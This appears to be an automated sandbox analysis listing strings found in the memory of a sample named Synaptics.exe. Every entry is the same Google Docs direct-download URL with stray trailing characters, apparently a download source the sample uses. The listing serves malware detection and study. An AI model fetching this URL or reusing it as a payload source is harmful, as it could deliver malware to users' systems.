                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDocum
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEFlX.
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEP
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadExpir
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG9
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGS/Z
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGUnY
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHP
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTAGV
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI9
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ0
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJS
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK(_XU
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKWR
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMAT
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMDT
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMYV
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadName
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOGlE
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOR
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOpene
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOruY-
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQF
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQS
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRR
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSEz
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSUZY
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047221664.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT7
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTAGV
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUG
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUIE
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUS1
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUz
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV)
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVWHKM
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW(
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWQ
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWV
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYAH
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYDH
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYR
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYZ.xlw
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.0000000000875000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZQ
